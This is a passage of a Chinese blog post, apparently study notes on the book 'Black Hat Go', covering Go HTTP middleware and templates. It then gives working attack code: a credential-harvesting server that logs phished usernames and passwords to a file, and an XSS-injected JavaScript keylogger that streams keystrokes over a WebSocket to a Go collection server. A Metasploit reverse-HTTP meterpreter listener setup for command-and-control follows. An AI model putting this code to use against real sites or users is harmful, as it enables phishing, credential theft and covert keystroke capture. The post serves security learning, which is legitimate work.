class="type">string</span></span><br><span class="line">&#125;</span><br><span class="line"><span class="function"><span class="keyword">func</span> <span class="params">(b *badAuth)</span></span>ServeHTTP(w http.ResponseWriter,r * http.Request,next http.HandlerFunc) &#123;</span><br><span class="line">	username := r.URL.Query().Get(<span class="string">&quot;username&quot;</span>)</span><br><span class="line">	password := r.URL.Query().Get(<span class="string">&quot;password&quot;</span>)</span><br><span class="line">	<span class="keyword">if</span> username != b.Username || password != b.Password  &#123;</span><br><span class="line">		http.Error(w,<span class="string">&quot;Unauthorized&quot;</span>,<span class="number">401</span>)</span><br><span class="line">		<span class="keyword">return</span></span><br><span class="line">	&#125;</span><br><span class="line">	ctx := context.WithValue(r.Context(),<span class="string">&quot;username&quot;</span>,username)</span><br><span class="line">	r = r.WithContext(ctx)</span><br><span class="line">	next(w,r)</span><br><span class="line">&#125;</span><br><span class="line"><span class="function"><span class="keyword">func</span> <span class="title">hello</span><span class="params">(w http.ResponseWriter, r *http.Request)</span></span> &#123;</span><br><span class="line">	username := r.Context().Value(<span class="string">&quot;username&quot;</span>).(<span class="type">string</span>)</span><br><span class="line">	fmt.Fprintf(w, <span class="string">&quot;Hi %s\n&quot;</span>, username)</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">func</span> <span class="title">main</span><span class="params">()</span></span> &#123;</span><br><span class="line">	r := mux.NewRouter()</span><br><span class="line">	r.HandleFunc(<span class="string">&quot;/hello&quot;</span>,hello).Methods(<span class="string">&quot;GET&quot;</span>)</span><br><span class="line">	n := negroni.Classic()</span><br><span class="line">	n.Use(&amp;badAuth&#123;</span><br><span class="line">		Username: <span class="string">&quot;admin&quot;</span>,</span><br><span class="line">		Password: <span class="string">&quot;password&quot;</span>,</span><br><span class="line">	&#125;)</span><br><span class="line">	n.UseHandler(r)</span><br><span class="line">	http.ListenAndServe(<span class="string">&quot;:8000&quot;</span>,n)</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>这里加入了<code>badAuth</code>，该中间件将仅用于模拟身份验证。该中间件有两个字段，<code>Username</code>和<code>Password</code>，并且实现了接口<code>negroni.Handler</code>，因为它定义了包含三个参数的<code>ServeHTTP()</code>方法，在该方法中，首先获取用户名和密码，然后与我们拥有的字段进行比较，如果用户名密码不正确，将发送401状态码。</p>
<p>如果凭证正确，我们需要将用户名添加到请求上下文中。调用<code>context.WithValue()</code>从请求中初始化上下文，在该上下文中设置一个<code>username</code>的变量。然后，可以调用<code>r.WithContext(ctx)</code>来确保进行新的上下文。</p>
<p>在函数<code>hello()</code>中，可以使用函数<code>Context().Value(interface&#123;&#125;)</code>，从请求上下文中获取用户名，该函数本身返回一个<code>interface()</code>。因为他是一个字符串，所以可以直接使用断言。</p>
<h3 id="7-使用模板生成HTML响应"><a href="#7-使用模板生成HTML响应" class="headerlink" title="7. 使用模板生成HTML响应"></a>7. 使用模板生成HTML响应</h3><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">package</span> main</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> (</span><br><span class="line">	<span class="string">&quot;html/template&quot;</span></span><br><span class="line">	<span class="string">&quot;os&quot;</span></span><br><span class="line">)</span><br><span class="line"></span><br><span class="line"><span class="keyword">var</span> x = <span class="string">`</span></span><br><span class="line"><span class="string">&lt;html&gt;</span></span><br><span class="line"><span class="string">  &lt;body&gt;</span></span><br><span class="line"><span class="string">    Hello &#123;&#123;.&#125;&#125;</span></span><br><span class="line"><span class="string">  &lt;/body&gt;</span></span><br><span class="line"><span class="string">&lt;/html&gt;</span></span><br><span class="line"><span class="string">`</span></span><br><span class="line"><span class="function"><span class="keyword">func</span> <span class="title">main</span><span class="params">()</span></span> &#123;</span><br><span class="line">	t, err := template.New(<span class="string">&quot;hello&quot;</span>).Parse(x)</span><br><span class="line">	<span class="keyword">if</span> err != <span class="literal">nil</span> &#123;</span><br><span class="line">		<span class="built_in">panic</span>(err)</span><br><span class="line">	&#125;</span><br><span class="line">	t.Execute(os.Stdout, <span class="string">&quot;&lt;script&gt;alert(&#x27;world&#x27;)&lt;/script&gt;&quot;</span>)</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>定义一个<code>x</code>变量，储存模板，在模板内部，可以使用NaN 约定定义占位符，可以是一个结构体，也可以是一个基本数据类型。在这里，使用单个<code>.</code>，告诉程序包，要在此处，渲染整个上下文。，如果我们要将<code>Username</code>内容床欸模板，我们只需要，<code>&#123;&#123;.Username&#125;&#125;</code>渲染该字段。</p>
<p>接下来创建一个模板，然后进行解析，最后返回一个<code>Template</code>的指针。</p>
<blockquote>
<p>panic 可以用作处理错误</p>
</blockquote>
<p>最后使用<code>Execute(io.Writer,interface&#123;&#125;)</code>，然后将模板传递给第二个变量，，这里使用<code>os.Execute()</code>生成了HTML</p>
<h2 id="0X01凭证收割"><a href="#0X01凭证收割" class="headerlink" title="0X01凭证收割"></a>0X01凭证收割</h2><p>社会工程学的主要内容之一是：凭证收割攻击。这种类型的攻击通过诱使用户在原始网站的复制版本中输入凭证来捕获用户的登录信息。</p>
<p>拥有用户的凭证之后，就可以在他们实际的站点上进行登录，这通常是突破组织边界的入口。</p>
<p>我们首先需要<code>copy</code>一份网站源码，地址在这：</p>
<p><a target="_blank" rel="noopener" href="https://github.com/blackhat-go/bhg/tree/master/ch-4/credential_harvester/public">https://github.com/blackhat-go/bhg/tree/master/ch-4/credential_harvester/public</a></p>
<p>将<code>index.html</code>中的这段内容，修改为如下</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">form</span> <span class="attr">name</span>=<span class="string">&quot;form&quot;</span> <span class="attr">method</span>=<span class="string">&quot;post&quot;</span> <span class="attr">action</span>=<span class="string">&quot;http://127.0.0.1:8080/login&quot;</span>&gt;</span></span><br></pre></td></tr></table></figure>

<p>然后我们开始使用 <code>python -m hpp.server</code> 开一个http服务</p>
<p><img src="https://cdn.jsdelivr.net/gh/h0ld1rs/image/image/20220303224017.png"></p>
<p>然后我们编写接受端的代码</p>
<figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">package</span> main</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> (</span><br><span class="line">	<span class="string">&quot;github.com/gorilla/mux&quot;</span></span><br><span class="line">	<span class="string">&quot;net/http&quot;</span></span><br><span class="line">	<span class="string">&quot;os&quot;</span></span><br><span class="line">	<span class="string">&quot;time&quot;</span></span><br><span class="line">	log <span class="string">&quot;github.com/sirupsen/logrus&quot;</span></span><br><span class="line">)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">func</span> <span class="title">login</span><span class="params">(w http.ResponseWriter, r *http.Request)</span></span> &#123;</span><br><span class="line">	log.WithFields(log.Fields&#123;</span><br><span class="line">		<span class="string">&quot;time&quot;</span>:       time.Now().String(),</span><br><span class="line">		<span class="string">&quot;username&quot;</span>:   r.FormValue(<span class="string">&quot;_user&quot;</span>),</span><br><span class="line">		<span class="string">&quot;password&quot;</span>:   r.FormValue(<span class="string">&quot;_pass&quot;</span>),</span><br><span class="line">		<span class="string">&quot;user-agent&quot;</span>: r.UserAgent(),</span><br><span class="line">		<span class="string">&quot;ip_address&quot;</span>: r.RemoteAddr,</span><br><span class="line">	&#125;).Info(<span class="string">&quot;login attempt&quot;</span>)</span><br><span class="line">	http.Redirect(w, r, <span class="string">&quot;/&quot;</span>, <span class="number">302</span>)</span><br><span class="line">&#125;</span><br><span class="line"><span class="function"><span class="keyword">func</span> <span class="title">main</span><span class="params">()</span></span> &#123;</span><br><span class="line">	fh, err := os.OpenFile(<span class="string">&quot;credentials.txt&quot;</span>, os.O_CREATE|os.O_APPEND|os.O_WRONLY, <span class="number">0600</span>)</span><br><span class="line">	<span class="keyword">if</span> err != <span class="literal">nil</span> &#123;</span><br><span class="line">		<span class="built_in">panic</span>(err)</span><br><span class="line">	&#125;</span><br><span class="line">	<span class="keyword">defer</span> fh.Close()</span><br><span class="line">	log.SetOutput(fh)</span><br><span class="line">	r := mux.NewRouter()</span><br><span class="line">	r.HandleFunc(<span class="string">&quot;/login&quot;</span>, login).Methods(<span class="string">&quot;POST&quot;</span>)</span><br><span class="line">	r.PathPrefix(<span class="string">&quot;/&quot;</span>).Handler(http.FileServer(http.Dir(<span class="string">&quot;public&quot;</span>)))<span class="comment">//提供静态文件</span></span><br><span class="line">	log.Fatal(http.ListenAndServe(<span class="string">&quot;:8080&quot;</span>, r))</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>这里首先，我们需要导入包<code>github.com/Sirupsen/logrus</code>，这是我们希望使用结构化日志的记录包。</p>
<p>我们首先定义了函数<code>login</code>，使用<code>log.WithFields()</code>，写出捕获的数据。显示，时间，用户名和密码，用户代理和请求的IP地址。然后通过调用<code>FormValues(string)</code>来获取这些元素。需要与表单中存在的名字相对应。之后重定向到根目录。</p>
<p>在main函数中，0600 指的是创建新文件，创建文件之后，使用<code>log.SetOutput()</code>将句柄传递给他，以配置日志记录包并将其写入该文件。接下来，还需要告诉路由器从一个目录中提供静态文件。</p>
<p>开启的文件夹再以另一份形式放在代码的根目录下，之后当我们运行代码后，访问伪造的80端口，会将信息发储存在txt中，并且重定向到正确的8080端口</p>
<p><img src="https://cdn.jsdelivr.net/gh/h0ld1rs/image/image/20220303224108.png"></p>
<p><img src="https://cdn.jsdelivr.net/gh/h0ld1rs/image/image/20220303230309.png"></p>
<h2 id="0x02-使用-websocket-API实现按键记录"><a href="#0x02-使用-websocket-API实现按键记录" class="headerlink" title="0x02 使用 websocket API实现按键记录"></a>0x02 使用 websocket API实现按键记录</h2><p>近年来，全双工通信协议(websocket API)日益流行，许多浏览器开始支持他，他为web应用服务器和客户端之间的有效通信提供了一些方法。最重要的是，他允许服务器无需轮询就可以将消息发送到客户端</p>
<p>websocket对于构建诸如聊天游戏等实时应用程序比较有用。但我们也有其他用处，例如，将键盘记录程序注入，捕获用户按下的每个键。当我们可以进行xss攻击以后，我们可以包含一个<code>javascript</code>文件，以处理来自客户端<code>websocket</code>响应。</p>
<p>我们使用<code>JS Bin</code>(<a target="_blank" rel="noopener" href="http://jsbin.com)来进行测试`payload`,代码如下/">http://jsbin.com)来进行测试`payload`，代码如下</a></p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;!DOCTYPE <span class="keyword">html</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">html</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">head</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;<span class="name">meta</span> <span class="attr">charset</span>=<span class="string">&quot;utf-8&quot;</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;<span class="name">meta</span> <span class="attr">name</span>=<span class="string">&quot;viewport&quot;</span> <span class="attr">content</span>=<span class="string">&quot;width=device-width&quot;</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;<span class="name">title</span>&gt;</span>Test<span class="tag">&lt;/<span class="name">title</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">head</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">body</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;<span class="name">script</span> <span class="attr">src</span>=<span class="string">&quot;http://127.0.0.1:8080/k.js&quot;</span>&gt;</span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;<span class="name">form</span> <span class="attr">action</span>=<span class="string">&#x27;/login&#x27;</span> <span class="attr">method</span>=<span class="string">&#x27;post&#x27;</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">input</span> <span class="attr">name</span>= <span class="string">&#x27;username&#x27;</span> /&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">input</span> <span class="attr">name</span>= <span class="string">&#x27;password&#x27;</span>/&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">input</span> <span class="attr">type</span>=<span class="string">&#x27;submit&#x27;</span>/&gt;</span></span><br><span class="line">  <span class="tag">&lt;/<span class="name">form</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">body</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">html</span>&gt;</span></span><br></pre></td></tr></table></figure>

<p>当我们打开页面的时候，会提示创建了连接</p>
<p><img src="https://cdn.jsdelivr.net/gh/h0ld1rs/image/image/20220304114813.png"></p>
<p>如下：</p>
<p><img src="https://cdn.jsdelivr.net/gh/h0ld1rs/image/image/20220304114719.png"></p>
<p>当我们再打开的html页面键入的时候，会自动捕捉</p>
<p><img src="https://cdn.jsdelivr.net/gh/h0ld1rs/image/image/20220304114915.png"></p>
<p>先定义一个js模板，如下</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">(<span class="keyword">function</span>(<span class="params"></span>) &#123;</span><br><span class="line">    <span class="keyword">var</span> conn = <span class="keyword">new</span> <span class="title class_">WebSocket</span>(<span class="string">&quot;ws://&#123;&#123;.&#125;&#125;/ws&quot;</span>);</span><br><span class="line">    <span class="variable language_">document</span>.<span class="property">onkeypress</span> = keypress;</span><br><span class="line">    <span class="keyword">function</span> <span class="title function_">keypress</span>(<span class="params">evt</span>) &#123;</span><br><span class="line">        s = <span class="title class_">String</span>.<span class="title function_">fromCharCode</span>(evt.<span class="property">which</span>);</span><br><span class="line">        conn.<span class="title function_">send</span>(s);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;)();</span><br></pre></td></tr></table></figure>

<p> 后端代码如下</p>
<figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">package</span> main</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> (</span><br><span class="line">	<span class="string">&quot;flag&quot;</span></span><br><span class="line">	<span class="string">&quot;fmt&quot;</span></span><br><span class="line">	<span class="string">&quot;html/template&quot;</span></span><br><span class="line">	<span class="string">&quot;log&quot;</span></span><br><span class="line">	<span class="string">&quot;net/http&quot;</span></span><br><span class="line"></span><br><span class="line">	<span class="string">&quot;github.com/gorilla/mux&quot;</span></span><br><span class="line">	<span class="string">&quot;github.com/gorilla/websocket&quot;</span></span><br><span class="line">)</span><br><span class="line"></span><br><span class="line"><span class="keyword">var</span> (</span><br><span class="line">	upgrader = websocket.Upgrader&#123;</span><br><span class="line">		CheckOrigin: <span class="function"><span class="keyword">func</span><span class="params">(r *http.Request)</span></span> <span class="type">bool</span> &#123; <span class="keyword">return</span> <span class="literal">true</span> &#125;,</span><br><span class="line">	&#125;</span><br><span class="line"></span><br><span class="line">	listenAddr <span class="type">string</span></span><br><span class="line">	wsAddr     <span class="type">string</span></span><br><span class="line">	jsTemplate *template.Template</span><br><span class="line">)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">func</span> <span class="title">init</span><span class="params">()</span></span> &#123;</span><br><span class="line">	flag.StringVar(&amp;listenAddr, <span class="string">&quot;listen-addr&quot;</span>, <span class="string">&quot;&quot;</span>, <span class="string">&quot;Address to listen on&quot;</span>)</span><br><span class="line">	flag.StringVar(&amp;wsAddr, <span class="string">&quot;ws-addr&quot;</span>, <span class="string">&quot;&quot;</span>, <span class="string">&quot;Address for WebSocket connection&quot;</span>)</span><br><span class="line">	flag.Parse()</span><br><span class="line">	<span class="keyword">var</span> err <span class="type">error</span></span><br><span class="line">	jsTemplate, err = template.ParseFiles(<span class="string">&quot;logger.js&quot;</span>)</span><br><span class="line">	<span class="keyword">if</span> err != <span class="literal">nil</span> &#123;</span><br><span class="line">		<span class="built_in">panic</span>(err)</span><br><span class="line">	&#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">func</span> <span class="title">serveWS</span><span class="params">(w http.ResponseWriter, r *http.Request)</span></span> &#123;</span><br><span class="line">	conn, err := upgrader.Upgrade(w, r, <span class="literal">nil</span>)</span><br><span class="line">	<span class="keyword">if</span> err != <span class="literal">nil</span> &#123;</span><br><span class="line">		http.Error(w, <span class="string">&quot;&quot;</span>, <span class="number">500</span>)</span><br><span class="line">		<span class="keyword">return</span></span><br><span class="line">	&#125;</span><br><span class="line">	<span class="keyword">defer</span> conn.Close()</span><br><span class="line">	fmt.Printf(<span class="string">&quot;Connection from %s\n&quot;</span>, conn.RemoteAddr().String())</span><br><span class="line">	<span class="keyword">for</span> &#123;</span><br><span class="line">		_, msg, err := conn.ReadMessage()</span><br><span class="line">		<span class="keyword">if</span> err != <span class="literal">nil</span> &#123;</span><br><span class="line">			<span class="keyword">return</span></span><br><span class="line">		&#125;</span><br><span class="line">		fmt.Printf(<span class="string">&quot;From %s: %s\n&quot;</span>, conn.RemoteAddr().String(), <span class="type">string</span>(msg))</span><br><span class="line">	&#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">func</span> <span class="title">serveFile</span><span class="params">(w http.ResponseWriter, r *http.Request)</span></span> &#123;</span><br><span class="line">	w.Header().Set(<span class="string">&quot;Content-Type&quot;</span>, <span class="string">&quot;application/javascript&quot;</span>)</span><br><span class="line">	jsTemplate.Execute(w, wsAddr)</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">func</span> <span class="title">main</span><span class="params">()</span></span> &#123;</span><br><span class="line">	r := mux.NewRouter()</span><br><span class="line">	r.HandleFunc(<span class="string">&quot;/ws&quot;</span>, serveWS)</span><br><span class="line">	r.HandleFunc(<span class="string">&quot;/k.js&quot;</span>, serveFile)</span><br><span class="line">	log.Fatal(http.ListenAndServe(<span class="string">&quot;:8080&quot;</span>, r))</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>这里需要先下载<code>github.com/gorilla/websocket</code>的包</p>
<p>首先，定义一个<code>websocket.Upgrader</code>，该实例会将每个来源列入白名单，允许所有来源的做法是不安全的，但是，这里，我们选择继续使用，当作测试用例。之后再定义监听地址和 ws地址。以及定义<code>js</code>所使用的模板地址</p>
<p>然后创建<code>init函数</code>，再main函数之前，自动调用</p>
<blockquote>
<p>flag包用来设置参数和解析值：地址，参数，默认值和备注</p>
<p>然后使用Parse()进行解析</p>
</blockquote>
<p>接下来定义了一个 <code>ServeWS</code>的函数，用来处理<code>websocket</code>通信，通过<code>upgrader.Upgrade</code>方法，创建新的<code>websocket,Conn</code>实例。方法<code>Upgrade()</code>升级了HTTP连接以使用<code>websocket</code>协议。这将意味着此函数处理任何请求都将升级为使用<code>websocket</code>，再无限的for循环中进行交互，调用<code>conn.ReadMessage()</code>读取信息，</p>
<p>然后我们创建一个<code>serveFile()</code>的处理函数，此函数将检索并且返回<code>javascript</code>的模板内容，其中包括上下文数据，为此，我们需要将<code>Content-Type</code>标头，设置为<code>application/javascript</code>，这就告诉连接正文，将与浏览器之间的响应内容视为<code>javascript</code>，</p>
<p>之后设置解析我们传入的<code>wsAddr</code></p>
<figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">jsTemplate.Execute(w, wsAddr)</span><br></pre></td></tr></table></figure>

<p>最后我们只要创建路由就可以了。</p>
<h2 id="0x03-多路命令和控制"><a href="#0x03-多路命令和控制" class="headerlink" title="0x03 多路命令和控制"></a>0x03 多路命令和控制</h2><p>在本节中，我们需要学会 go 创建反向<code>http</code>代理，以便可以基于<code>Host HTTP</code>标头动态路由中传入的<code>Meterpreter</code>会话，这正是虚拟网站托管的方式。</p>
<p>首先，代理会充当重定向器，允许你仅公开域名和<code>IP</code>地址，而无需公开<code>metasploit</code>监听器，如果重定向器曾被列为黑名单，你可以直接移除他，而不是移除<code>C2</code>服务器。其次，你可以扩展这里的概念来进行域前置，他是利用可信第三方域绕过限制性出口的技术。</p>
<p>首先，我们需要设置单独的<code>MeterPreter</code>反向HTTP监听器</p>
<p>大致如下</p>
<blockquote>
<p>msf6 &gt; use exploit&#x2F;multi&#x2F;handler<br>[*] Using configured payload generic&#x2F;shell_reverse_tcp<br>msf6 exploit(multi&#x2F;handler) &gt; set payload windows&#x2F;meterpreter_reverse_http<br>payload &#x3D;&gt; windows&#x2F;meterpreter_reverse_http<br>msf6 exploit(multi&#x2F;handler) &gt; set LHOST 192.168.68.130<br>LHOST &#x3D;&gt; 192.168.68.130<br>msf6 exploit(multi&#x2F;handler) &gt; set LPORT 80<br>LPORT &#x3D;&gt; 80</p>
<p>msf6 exploit(multi&#x2F;handler) &gt; set ReverseListenerBindAddress 192.168.68.130<br>ReverseListenerBindAddress &#x3D;&gt; 192.168.68.130<br>msf6 exploit(multi&#x2F;handler) &gt; set ReverseListenerBindPort 20080<br>ReverseListenerBindPort &#x3D;&gt; 20080<br>msf6 exploit(multi&#x2F;handler) &gt; exploit -j -z<br>[<em>] Exploit running as background job 0.<br>[</em>] Exploit completed, but no session was created.</p>
<p>[*] Started HTTP reverse handler on <a target="_blank" rel="noopener" href="http://192.168.68.130:20080/">http://192.168.68.130:20080</a></p>
</blockquote>
<blockquote>
<p> exploit -j -z    #handler后台持续监听</p>
</blockquote>
<p>然后，我们再以同样的方式,开一个30080端口</p>
<p><img src="https://cdn.jsdelivr.net/gh/h0ld1rs/image/image/20220304125300.png"></p>
<p>这个没有成功复现，鸽一会</p>
</article><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta">文章作者: </span><span class="post-copyright-info"><a href="mailto:undefined">h0ld1rs</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta">文章链接: </span><span class="post-copyright-info"><a href="https://h0ld1rs.github.io/posts/13916.html">https://h0ld1rs.github.io/posts/13916.html</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta">版权声明: </span><span class="post-copyright-info">本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" target="_blank">CC BY-NC-SA 4.0</a> 许可协议。转载请注明来自 <a href="https://h0ld1rs.github.io" target="_blank">h0ld1rs的博客</a>！</span></div></div><div class="tag_share"><div class="post_share"><div class="social-share" data-image="/img/image/5.png" data-sites="facebook,twitter,wechat,weibo,qq"></div><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/social-share.js/dist/css/share.min.css" media="print" onload="this.media='all'"><script src="https://cdn.jsdelivr.net/npm/social-share.js/dist/js/social-share.min.js" defer></script></div></div><nav class="pagination-post" id="pagination"><div class="prev-post pull-left"><a href="/posts/12296.html"><img class="prev-cover" src="/img/image/6.png" onerror="onerror=null;src='/img/404.jpg'" alt="cover of previous post"><div class="pagination-info"><div class="label">上一篇</div><div class="prev_info">Go渗透测试笔记(五)</div></div></a></div><div class="next-post pull-right"><a href="/posts/32502.html"><img class="next-cover" src="/img/image/4.png" onerror="onerror=null;src='/img/404.jpg'" alt="cover of next post"><div class="pagination-info"><div class="label">下一篇</div><div class="next_info">Go渗透测试笔记(三)</div></div></a></div></nav><div class="relatedPosts"><div class="headline"><i class="fas fa-thumbs-up fa-fw"></i><span>相关推荐</span></div><div class="relatedPosts-list"><div><a href="/posts/166.html" title="Go渗透测试笔记(七)"><img class="cover" src="/img/image/8.png" alt="cover"><div class="content is-center"><div class="date"><i class="far fa-calendar-alt fa-fw"></i> 2022-03-05</div><div class="title">Go渗透测试笔记(七)</div></div></a></div><div><a href="/posts/36907.html" title="Go渗透测试笔记(六)"><img class="cover" src="/img/image/7.png" alt="cover"><div class="content is-center"><div class="date"><i class="far fa-calendar-alt fa-fw"></i> 2022-03-05</div><div class="title">Go渗透测试笔记(六)</div></div></a></div><div><a href="/posts/61606.html" title="Go渗透测试笔记(一)"><img class="cover" src="/img/image/2.png" alt="cover"><div class="content is-center"><div class="date"><i class="far fa-calendar-alt fa-fw"></i> 2022-02-14</div><div class="title">Go渗透测试笔记(一)</div></div></a></div><div><a href="/posts/32502.html" title="Go渗透测试笔记(三)"><img class="cover" src="/img/image/4.png" alt="cover"><div class="content is-center"><div class="date"><i class="far fa-calendar-alt fa-fw"></i> 2022-03-01</div><div class="title">Go渗透测试笔记(三)</div></div></a></div><div><a href="/posts/31081.html" title="go渗透测试笔记(二)"><img class="cover" src="/img/image/3.png" alt="cover"><div class="content is-center"><div class="date"><i class="far fa-calendar-alt fa-fw"></i> 2022-02-18</div><div class="title">go渗透测试笔记(二)</div></div></a></div><div><a href="/posts/12296.html" title="Go渗透测试笔记(五)"><img class="cover" src="/img/image/6.png" alt="cover"><div class="content is-center"><div class="date"><i class="far fa-calendar-alt fa-fw"></i> 2022-03-04</div><div class="title">Go渗透测试笔记(五)</div></div></a></div></div></div><hr/><div id="post-comment"><div class="comment-head"><div class="comment-headline"><i class="fas fa-comments fa-fw"></i><span> 评论</span></div></div><div class="comment-wrap"><div><div id="twikoo-wrap"></div></div></div></div></div><div class="aside-content" id="aside-content"><div class="card-widget card-info"><div class="is-center"><div class="avatar-img"><img src="/img/1.jpg" onerror="this.onerror=null;this.src='/img/friend_404.gif'" alt="avatar"/></div><div class="author-info__name">h0ld1rs</div><div class="author-info__description">希望能认识更多师傅，学到更多东西</div></div><div class="card-info-data is-center"><div class="card-info-data-item"><a href="/archives/"><div class="headline">文章</div><div class="length-num">21</div></a></div><div class="card-info-data-item"><a href="/tags/"><div class="headline">标签</div><div class="length-num">8</div></a></div><div class="card-info-data-item"><a href="/categories/"><div class="headline">分类</div><div class="length-num">7</div></a></div></div><a id="card-info-btn" target="_blank" rel="noopener" href="https://github.com/h0ld1rs"><i class="fab fa-github"></i><span>Follow Me</span></a></div><div class="card-widget card-announcement"><div class="item-headline"><i class="fas fa-bullhorn fa-shake"></i><span>公告</span></div><div class="announcement_content">This is my Blog</div></div><div class="sticky_layout"><div class="card-widget" id="card-toc"><div class="item-headline"><i class="fas fa-stream"></i><span>目录</span><span class="toc-percentage"></span></div><div class="toc-content"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#Go%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%E7%AC%94%E8%AE%B0-%E5%9B%9B-%E2%80%93HTTP%E6%9C%8D%E5%8A%A1%E5%99%A8%EF%BC%8C%E8%B7%AF%E7%94%B1%EF%BC%8C%E4%B8%AD%E9%97%B4%E4%BB%B6"><span class="toc-number">1.</span> <span class="toc-text">Go渗透测试笔记(四)–HTTP服务器，路由，中间件</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#0x00-HTTP%E6%9C%8D%E5%8A%A1%E5%99%A8%E5%9F%BA%E7%A1%80"><span class="toc-number">1.1.</span> <span class="toc-text">0x00 